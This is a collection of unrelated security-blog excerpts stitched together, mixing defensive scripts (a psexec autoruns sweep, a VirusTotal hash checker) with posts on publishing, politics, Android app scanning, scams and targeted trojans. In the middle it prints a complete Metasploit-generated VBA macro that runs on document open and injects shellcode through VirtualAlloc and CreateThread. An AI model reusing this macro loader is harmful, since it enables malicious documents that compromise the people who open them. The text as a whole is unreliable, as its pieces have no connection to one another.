for /L %i in (1, 1, 254) do @psexec -s -n 4 -d \\n.n.n.%i cmd /c "net use o: 
\\server\share PASSWORD /user:doman\username && 
\\live.sysinternals.com\tools\autorunsc -a -v -f -c '*' > 
o:n.n.n%i.csv && net use o: /delete"

#!/bin/bash
# A working proof of concept, lacking many features

# Gather all hashes for unsigned code from autoruns csv output file named aruns.csv
grep -i "(Not Verified)" aruns.csv | awk -F, '{print $(NF-2)}' | sort | uniq > aruns_hashes

# Reduce the data set to hashes that aren't in our good list
if [ -e hashes_cleared ]; then
    grep -vif hashes_cleared aruns_hashes > hashes2check
else
    mv aruns_hashes hashes2check
fi

# Should create a list of bad hashes and check against it too
if [ -e hashes_evil ]; then
    grep -if hashes_evil hashes2check > aruns_malware_hashes
fi

# Remove malware hashes from hashes2check
if [ -e aruns_malware_hashes ]; then
    grep -vif aruns_malware_hashes hashes2check > vtsubmissions
else
    mv hashes2check vtsubmissions
fi

# Search VirusTotal for reports on remaining hashes
echo "[+] $(wc -l vtsubmissions) hashes to check with Virus Total"
sleep 2
for i in $(cat vtsubmissions); do wget --header= -O $i.html --no-check-certificate \
https://www.virustotal.com/latest-scan/$i; sleep 15; done

# Check results for malware
grep -l "[1-9][0-9]* / " *.html | awk -F. '{print $1}' | tee -a aruns_malware_hashes \
>> hashes_evil

# Pull out malware entries from aruns.csv
grep -if aruns_malware_hashes aruns.csv > aruns_malware

# Check results for non-malicious files
grep -l "0 / " *.html | awk -F. '{print $1}' >> hashes_cleared

# Check for results tnat are unknown to VT
grep -li "not found" *.html | awk -F. '{print $1}' >> unknowns

# Pull unkown entries from aruns.csv
grep -if unknowns aruns.csv > aruns_unknown

# Report results
let j=$(wc -l aruns_malware)
echo "[+] VirusTotal shows $j Autoruns entries may be malicious."
echo "[+] Check the aruns_malware file for details."
let j=$(wc -l aruns_unknown)
echo "[+] VirusTotal has never seen $j Autoruns entries."
echo "[+] Check the aruns_unknown file for details."
echo

cat n.n.n.* | sort | uniq > aruns.csv 

Figure 1: lamelyzer's first run as evidenced by the lack of data files.

Figure 2: lamelyzer reports there are 114 hashes to submit to VirusTotal and begins making requests

Figure 3: Directory listing while lamelyzer is in progress. Each html file is a VirusTotal report.

Figure 4: lamelyzer has finished and is showing results.

Figure 5: Post execution directory listing of non-html files.

Figure 6: A subsequent run of lamelyzer with an aruns.csv with 838 entries, only 77 will be submitted to VirusTotal.

We've seen a number of comments and questions on Twitter regarding a recent Trustwave CA Policy Update to our legal repository (https://ssl.trustwave.com/CA). This update discusses a subordinate root revocation. This is a proactive revocation, of the only certificate we issued for these purposes, that is the result of careful consideration in light of recent policy changes and the changing PKI landscape. 

(The system isn’t pefect.  Ralph Merkle couldn’t get his paper on asymmetric encryption published because a reviewer felt it “wasn’t interesting.”  The greatest advance in crypto in 4,000 years and it wasn’t interesting?)

These are, of course, the same journals that are lobbying to have their monopoly business protected by the “Research Works Act,” among other things.  (The “Resarch Works Act” is a whole different kettle of anti-[open access|public domain|open source] intellectual property irrationality.)

I was, initially, a bit surprised by the study on forced citations.  After all, these are, supposedly, the guardians of truth.  Yes, OK, that’s naive.  I’ve published in magazines myself.  Not the refereed journals, perhaps: I’m not important enough for that.  But I’ve been asked for articles by many periodicals.  They’ve had all kinds of demands.  The one that I find most consistently annoying is that I provide graphics and images.  I’m a resarcher, not a designer: I don’t do graphics.  But, I recall one time that I was asked to do an article on a subject dear to my heart.  Because I felt strongly about it, I put a lot of work into it.  I was even willing to give them some graphics.  And, in the end, they rejected it.

Not enough quotes from vendors.

This is, of course, the same motivation as the forced citations.  In any periodical, you make money by selling advertising.  In trade rags, the ease of selling advertsing to vendors is determined by how much space you’ve given them in the supposed editorial content.  In the academic journals, the advertising rates are determined by the number of citations to articles you’ve previously published.  Hence, in both cases, the companies with the advertising budgets get to determine what actually gets published.

(As long as we’ve here, I have one more story, somewhat loosely related to publishing, citation, open access, and intellectual property.  On another occasion, I was asked to do a major article cluster on the history of computer viruses.  This topic is very dear to my heart, and I put in lots of time, lots of work, and even lots of graphics.  This group of articles got turned down as well.  The reason given in that case was that they had used a Web-based plagiarism detector on the stuff, and found that it was probably based on materials already on the net.  Well, of course it was.  I wrote most of the stuff on that topic that is already on the Web …)

-

Let the experts make sure your website is safe. Vulnerability Assessment is the answer.

As part of the activities that I've been developing for AP²SI I've just found this. And I could not resist sharing.

Yes, it's true that the cost of digital certificates is not, typically, very small. And this is one of the factors that have conditioned the widespread adoption of SSL on web servers, even though this mechanism would allow the authentication of those services, and would ensure the privacy of customer communications.

(The cost is not the only factor limiting the adoption of SSL, but it's surely a major factor, along with the performance.)

If you want to build more confidence in your Internet websites, or even in your intranet sites, Comodo has an offer with an unbeatable price, an offer that doesn't add the same degree of confidence of an EVS certificate, but that may be sufficient to meet your requirements.

Mechanical locks tell no tales.

Read Full Post

Slated for March 27-29, 2012, the National Institute of Standards and Technologies [NIST] has entitled the new FISSEA conference “A New Era in Cybersecurity Awareness, Training, and Education”. Venue is the NIST complex in Gaithersburg, Maryland. I highly  recommend attending the conference (and memebrship as well) for  information systems security professionals working in the United States Federal Government environs, managers responsible for information systems security training programs within federal agencies, and faculty members of accredited educational institutions who are involved in information security training and education.

Current government policy is that which the coalition partners can agree with the tribes of Whitehall, as well as each other. Oliver Letwin has asked the Conservative Policy Forum (CPF) to start looking at Conservative policy for the next election. Few of you will have heard of the Conservative Policy Forum. I attended their first "winter school" last weekend not knowing what to expect. 

What I experienced changed my way of thinking about policy formation in the modern world. The event evolved from an awkward discussion on the nature of conservatism through a great workshop on what is meant by "the big society" to a rollicking debate on the nature of democracy  in the modern world.  The underlying theme was how to reconnect political discussion with the priorities of the majority of voters, as opposed to the introverted obsessions of the Westminster village and the blogocracy and twitterati in their cyberghettoes.  

The majority of the electorate is now on-line but the backlash to political spam is gathering pace. We need a candid look at how technology is used to help progress political debate, avoiding the "dictatorship of the sysadmins" (as with automated on-line consultation systems) and neither cocooning elected representatives nor exposing them to such e-overload that they have no time to sleep - let alone think.  Putting the "party", (food, drink and physical networking) back into the Party, alongside "pseudo-social" electronic networking is a larger part of the answer than the cybernerds would have us believe. 

 The Winter School debate on the nature of the Big Society revealed a surprising degree of agreement alongside great difficulty in agreeing meaningful soundbites.  There were various comments about the "culture of volunteering", "the we society not the me society" and "social investment" but, for me "the de-nationalisation of compassion" encapsulated both what was meant and the scale and nature of the challenge. For nearly a century political debate has focussed on ways of using OPM (other people's money) to pay professionals to look after us when we are ill or in need.  The Labour government not only spent the surpluses being created when it came to office, it mortgaged the future and left central government financially and morally bankrupt and discredited.  We have now no choice but to continue the process of denationalisation. 

The challenge to the IT industry is profound. It has to switch from helping administer and police top-down steam-age. (they date from the 1918 Haldane Report), centralised, standardised, silo-based, national services. It has to work out how to help support and encourage a kaleidoscope of bottom up, Internet age, locally organised initiatives to meet community needs. The win-win solution that O2 is about to supply to Westminster and Kensington councils indicates that the Cabinet Office strategy of moving towards ubiquitous fixed and mobile broadband access to cloud-based  government data services is more than just an elegant conceptual solution. But how many other suppliers see the opportunity to leapfrog into a new, more profitable and sustainable world?  How many are more concerned to defend their current contracts and past business models?

At the heart of the big information society is the challenge of listening to what users and customers want and allowing services to evolve as those wants are informed by experience. This does not come easily to IT experts who despise customers, let alone ignorant end-users who do not do as they are expected.  Most self-styled  IT "professionals" are much more comfortable in a world where politicians have "visions", listen to Think Tank gurus and then commission consultants to specify major change programmes for which they can submit safe blame-avoidance bids.    

That leads me to the final debate at the CPF Winter School. This was on the nature of democracy. Do voters really want to have to decide on local priorities in, for example, on-line referendums?  Would they not would prefer to leave it to their elected representatives so that they can grumble when they get it wrong?  I had forgotten the supposed Voltaire quote on the best form of Government: "Benevolent dictatorship, tempered by the occasional assassination".  We live within a semi-elected dictatorship. A surprising amount of even council spend is agreed by lobbying groups in Brussels, gold plated by Civil Servants, rubber stamped by Ministers and passed on the nod by the Westminster Parliament. An example is the waste directives.   But earlier in the conference we had been told that obsession with "Europe" is an electoral turn-off. Barely 4% think it a top issue. "Its the economy stupid", followed by unemployment, race and immigration and law and order. 

The "answer" to the "democratic deficit" had meanwhile been addressed in the discussions on how the Conservative Policy Forum should operate. Nearly half of constituencies now have branches and some are already as strong as the best of the old CPC branches.  The big difference is that instead of discussing briefs on the issue of the  day they are have been asked to work on ideas and material for the 2015 manifesto. More-over they will be encouraged to bring in outside experts and non-members to ensure that their recommendations are likely to command support from the majority of the electorate.  I will therefore be asking the members of the Conservative Technology Forum to help inform debate at the constituency and regional level on how technology can and should be used to support local needs - not used as an excuse for imposing central diktats. I will also be asking them to help trial tools for on-line debate and how to use these to ensure discussions reflect the views of the mass of participants, not just those  with the time to drown out those who disagree with them.

As regular readers will know, my motto is "The silent majority gets what is deserves, ignored." If you want to participate, find your local the Conservative Policy Forum group  or join the Conservative Technology Forum (sooner or later we will get round top updating the website  meanwhile the on-line activity is via Linked In). Be active in your local constituency party as well.  If you are not a Conservative,  join the party of your choice and take part in their routines for policy formation. 

If you fail to do so, you will have helped preserve a world where policy ideas emerge from Think Tanks, are refined in negotiation between the wonks of Brussels and Westminster and the lobbyists of big business, to be implemented  by civil servants looking forward to second careers as regulators or as consultants with those who employ the lobbyists.   

Of course, from a more global point of view… you could argue that -20 degrees is actually a pretty nice summer temperature, especially in Antarctica.  They have “summer” there right now.  And that brings me nicely to the ‘active users’ count.   To make sure we have decent understanding how many users have our product installed, we measure how many are getting an update of the virus definitions database.   And, with each update, we can locate the user to a particular country or region based on the GEO IP.  It is heartwarming to see that every “Antarctic summer” we have a handful of avast! users updating their virus definitions from Antarctica.  So whoever is down there: Enjoy the summer, mulled wine, good book and internet browsing.  Or what else you do getting through those temperatures.  And please send me a note on how well avast! antivirus is handling in the local weather

VIDEO:   here is a recent map of the global avast! presence.  Pretty good coverage.

We are a non-profit tech company that develops free and open source software for information collection, visualization and interactive mapping.

Facebook Readies IPO Filing
- A LOT of people use Facebook
- A LOT of money

Lion 10.7.3
- Matt Hasn’t upgraded
- Bill and Patrick have had zero problems

Basic FreeNAS Setup
- We use it, it’s nice
- Matt is looking for his own personal setup
- Western Digital TV perhaps?
- Matt might be buying a PS3 or Xbox 360

FBI plans social network map alert mash-up application
- Why?
- There are plenty of existing services, why build something new?

New RIM CEO
- Won’t help
- No vision

Hurricane Labs Boastcast
Modern Search Engines for the Contemporary User
Gaining Access to a Check Point Appliance – Physical Access Trumps All

Hack of the Week
Anonymous hackers leak Scotland Yard-FBI conference call

App of the Week
Lookout Mobile Security Threat Tracker

Meanwhile, in BotNet news, we learn of the apparent rising from the ashes of the proverbial bitwise pyre by Kelihos, and it’s nefarious blunderings out and about; regardless of the declared morte of this pesky bit of code, it is evidently the new gift that just keeps on giving… Oops.

Ʊ

SpiderLabs customers are frustrated with PDF reports:

• You can’t search them
• You can’t sort them
• You can’t assign pieces of them
• You can’t trend them

PenTest Manager, the reporting tool used by Trustwave SpiderLabs to manage, track and report results of penetration tests, was designed specifically to solve these issues. We realized that the way most consulting company’s delivery reports just doesn’t work.

This week, we pushed out a new set of reporting updates for Trustwave PenTest Manager which is now available for all customers. Why? Reporting enhancements are one of the most requested features we get from customers.

The major updates are:

• Customized Methodologies - Within SpiderLabs, we understand that a standard, canned approach to risk assessments does not always work. Business risks differ across organizations; technologies change and evolve, and therefore require different tools, different techniques, and a fresh approach. We have enhanced our online reporting to now support customized test methodologies, so get your ATMs, SCADA systems, and arduino home automation systems ready for SpiderLabs deep technical security reviews.
• Tag and Report on Specific Findings– Now you can add a personalized tag to a finding in the form of a keyword or term, and then generate reports based on your tagged findings. Group and report security findings by business unit, engineering group, geographical region, or any other way you want to slice the data. This tagging and filtering works at both a test level and a finding level to provide complete control to generate customized reports.
• Overall CVSS Scoring – Since PenTest Manager is the only online reporting tool for consultant-led penetration testing, we are in a unique position to not only provide Base CVSS scores, but also provide temporal and environmental vulnerability information that accurately reflects the risk to a business through our hands–on testing approach. Automated tools have no way to understand and report the Overall CVSS score given the complexities of diverse technical environments and lifecycle of exploits…but we do!
• Performance Enhancements – Nobody wants to wait for data to load or reports to generate, so we took significant steps to speed up the responsiveness of PenTest Manager by refactoring key areas for performance.

Stay tuned for more enhancements in the near future. For additional info on PenTest Manager, check out the website and videos: https://www.trustwave.com/pentest-manager.php

msf > use payload/windows/exec
msf  payload(exec) > set CMD calc
CMD => calc
msf  payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf  payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf

Sub Auto_Open()
        Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
        Dim  Xlbufvetp As LongPtr
#Else
        Dim  Xlbufvetp As Long
#EndIf
        Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
        Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
        For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
                Wyzayxya = Hyeyhafxp(Zolde)
                Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
        Next Zolde
        Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub

Cunningly envisioned by Corning

Traditionally, the barriers of entry for developers in the Android ecosystem have been low to get their apps placed in the official Market. This was by design, allowing Android to sprint past other smartphone platforms in adoption rates, since many apps that users wanted were likely to be there before they hit other platforms. The downside is that app authors choosing to bundle malicious, or borderline malicious apps had an easier time with distribution.

By contrast, the iPhone ecosystem represented a more closed, vetted, and more expensive environment for developers to launch their apps. This resulted in steady growth, but the more rigid process of an app making it to their official App Store deterred the more unsavory app developers from spending the extra effort to circumvent controls. In short, it was easier to spread bad things, or borderline bad things on the Android smartphones.

The new effort, called Bouncer, aims to silently scan the marketplace for rogue and borderline apps, largely transparently to the user. When a new app upload is attempted by the developer, Bouncer will do a preliminary scan to determine whether it acts malicious, or borderline.

Hiroshi Lockheimer, VP of Engineering, Android, explains in his blog on the subject that the effort “provides automated scanning of Android Market for potentially malicious software without disrupting the user experience of Android Market or requiring developers to go through an application approval process.”

Bouncer aims to run each app in a simulated cloud-base environment to watch for malicious activity. It will also scan for changes in existing apps. If it detects an app has changed, it will red flag it for scanning, keeping existing apps (hopefully) more malware-free. Additionally, developers exhibiting a pattern publishing malicious apps may be blacklisted. Is it working? In the second half of 2011, Mr. Lockheimer says “we saw a 40% decrease in the number of potentially-malicious downloads from Android Market,” so progress seems positive.

With an estimated 11 million apps available for Android, and a year-over-year growth rate of 250% according to Mr. Lockheimer, there’s a lot of scanning to be done. But this also speaks toward the success and ubiquity of the platform, and perceived value to users. In that department, Android has done quite well indeed.

This past year, Homeland Security officials and officers from U.S. Customs and Border Protection conducted a national sweep of stores, flea markets and street vendors looking for counterfeit goods. Operation Fake Sweep collected $4.8 million worth of counterfeit jerseys, ball caps, and T-shirts. Ahead of this weekend’s Super Bowl, authorities said they seized nearly 42,000 phony Super Bowl sportswear items and merchandise worth $5 million. Fake jerseys can be bought for about $80 each. But according to nflshop.com, authentic jerseys cost between $150 and $300.

The Better Business Bureau (BBB) warns about buying counterfeit team merchandise and tickets online. They have found fake websites that appear to sell merchandise but are fronts for collecting credit card numbers and personal information which could lead to identity theft or drained bank accounts. The best way to ensure that you get official sports gear is to buy directly from the team or league websites, or from official vendors at the stadium.

The BBB also warns that buying tickets online can be a rip-off. Thousands of Super Bowl tickets are currently listed on craigslist, but the site offers no guarantees of any kind and does not require identification of its listers. Buying in person isn’t always an improvement, since scammers can fake tickets.

The Department of Transportation (DOT) is warning consumers about the possibility of Super Bowl tour package scams – specifically, scams that appear to promise game tickets, but fail to produce. DOT cautions travelers that if a game ticket is not specifically mentioned in advertisements or other solicitation material or listed as a tour feature, the ticket is probably not included. Fans should carefully review travel packages advertised online and make sure tickets and accommodations are fully guaranteed.

In general, avoid scams by being skeptical of:

• Offers that sound “too good to be true”
• Pushy sales tactics
• Poor quality of merchandise
• Offers that require wire transfer of funds

A good way to gauge the trustworthiness of any website is to take a look at the avast! WebRep rating. The rating icon in located beside the address bar in your browser. Click on it to see the overall rating and to add your own rating.

This article by Kelly Jackson Higgins is very much to the same point - How To Spot A Fake Facebook Profile - though it’s likely to be useful in many other contexts, not just support scams. (More about support scams later, soon, though.)

It’s based on research by Barracuda Networks, by the way, as discussed at the Kaspersky Lab Security Analyst Summit 2012, which is apparently happening now.

David Harley CITP FBCS CISSP
Small Blue-Green World/AVIEN
ESET Senior Research Fellow

kitten, by Clevergrrl

Have you checked out ISSA Connect yet? The next issue is up there with my column, No Bubble People.

We must assume malware will end up in our network. Unless we treat our users like the Boy in the Bubble, they will click things and infect themselves—many times without even realizing it. This month’s column discusses the war we face understanding that we cannot fight or even win every battle.

If you are a member, log into ISSA Connect and join the discussion! Interact with great professionals globally as well as the authors that you enjoy reading every month. If you are not a member, sign up today!

Possibly Related Posts:

• January 2012 Roundup
• Links for 2012-01-17
• Links from 2012-01-07 through 2012-01-11
• Links for 2012-01-05
• Herding Cats: Persona You (January 2012)

Clearly, Craig from ThatsNonsense.com also thinks that hoaxes are a significant nuisance and worse, judging from a very-much-to-the-point article he’s contributed to Facecrooks.

While his arguments to the effect that there is no such thing as a harmless hoax won’t be particularly new to old-school hoaxwatchers, their application in the particular context of Facebook (though they’ll apply to other social networks too, of course) is right on the button.

Talking of a hoax that’s clearly doing harm, Facecrooks.com has teamed up with  ThatsNonsense.com, Hoax-Slayer, The BULLDOG Estate and Privacy and Security Guide to try to reduce the impact of those unpleasant chain messages that try to persuade you to forward them by convincing you that if you do, the children whose photographs they use will benefit from medical treatment.

No-one is making treatment of sick children conditional on the posting of chain-messages. And the unauthorized misuse of the photos of real sick children is obviously hurtful to their parents.

David Harley CITP FBCS CISSP
Small Blue-Green World/AVIEN/Mac Virus
ESET Senior Research Fellow

Here’s something that most of us around DC have to worry about … either directly or indirectly through our enterprise users. First it was a spiked PDF document disguised as a CFP. A few days later it was a list of conference attendees in a booby-trapped ZIP file. Now it’s back to malicious PDF files that install a Trojan that mimics Windows Update. Seculert and Zscaler describes this most recent threat in their “The MSUpdater Trojan and Ongoing Targeted Attacks” report they released a few days ago. The paper describes how attackers continue to target government contractors with the goal of stealing sensitive information using complex and difficult to detect Trojans that gain backdoor access to systems. Ah … the fight goes on.

via myce.com

A joint report was just released that details attacks that have been targeted at government contractors since 2009. The attacks involve phishing emails under the guise of inviting people to conferences.

The report by Seculert and Zscaler, details that the phishing emails contain PDFs that when opened exploit Adobe Reader flaws. These files then install an “MSUpdater” trojan, which does a very good job of posing as a legitimate Windows Update process. What really happens is that the trojan provides backdoor access into the network, giving the attackers unfettered access to very sensitive files, for as long as the trojan remains active.

The report states, “Foreign and domestic (United States) companies with intellectual property dealing in aero/geospace and defense seem to be some of the recent industries targeted in these attacks.” The report does not detail exactly which companies have been involved.

Continued here.

#####

Please let us know what you think. What controls could the government use to mitigate this threat? Today’s post image is from MyAntiSpyware.com.

Oops. Apparently, an FBI conference call was tapped by Antisec and they managed to listen in on a discussion between the FBI and their UK counterparts.

The call was posted to YouTube:

I wasn’t sure if this was authentic but, I have to admit if I was a betting man I would have said yes. And, sure enough the FBI stated as much today.

From The Washington Post:

The FBI said the information “was intended for law enforcement officers only and was illegally obtained.”

“A criminal investigation is under way to identify and hold accountable those responsible,” the bureau said in a statement.

It’s not clear how the hackers got their hands on the recording, which appears to have been edited to bleep out the names of some of the suspects being discussed.

Rather interesting to hear their side of things even if it is as a fly on the wall.

Source: Article Link

(Image used under CC from Wilheln)

In this episode we talk about Symantec. We introduce a very cool SpearPhishing tool (which is free), the VeriSign attack and we discuss RFID implications and microwave cooking directions for credit cards.

Links for this Episode:

1. New SpearPhising tool


2. VeriSign Hack


3. RFID and Credit Cards.


4. Offensive Countermeasures in Orlando!

Video Feeds:

When I started my investigations, I had a limited number of data sources: The firewall logs and a network monitoring appliance. No log management solution and the server was turned off “to avoid more problems” (OMG!). The firewall logs gave me of course some relevant information but what about the network monitoring appliance? This is the same kind of appliance that I’m using during the BruCON conference to keep an eye on the visitors traffic. Very nice statistics can be generated. Basically, this appliance performs three tasks:

• Collection of all network flows + statistics (like Netflow)
• IDS (packets are analyzed via a built-in Snort)
• Web categorization

My investigations continued on this appliance and, as you can imagine, I found a multitude of evidences:

• Snort alerts (IRC traffic, id, wget, root alerts)
• Unusual traffic from servers to the Internet
• Suspicious web sites (domains & categories)

By having a look at the information reported by the appliance, the customer could at an early stage (even in real-time!) be alerted of the attack. But those features were simply… not used! The appliance was installed to monitor the network performances, that’s it! But it could do much more!

That’s an effect of the “Microsoft Syndrome“! What is this? I found a good definition on computerworld.com:

“There are several symptoms. One is when a tech company becomes so successful in a market and grows so quickly that it overlooks potential new markets. Another is when a tech company gets so large that it becomes increasingly difficult for it to innovate.“

From my point of view, I would like to extend this definition on the technical aspect of IT products:

“Another symptom is when a software becomes so complex that you only use a few percentage of its features and forgot or don’t know how to use the others.“

A typical example is Microsoft Word. I’m a Word user but, honestly, I must use 10% of all the features! Sometimes, I’m working on RFP which go very deep in the feature requirements and, finally, most of them will remain unused or unimplemented.

I think it’s time to remind the principle of “more with less“. Implementing security solutions is very expensive and budgets are often frozen or reduced. If you put some (lot of) bucks into a solution, be sure to use it at 100%! Read the manuals (you know, “RTFM!”), follow trainings, invest some time! Sometimes, cool features could be used for other purposes and increase the ROI! This reflexion goes in the same direction as one of my previous article about implementing security controls using Nagios.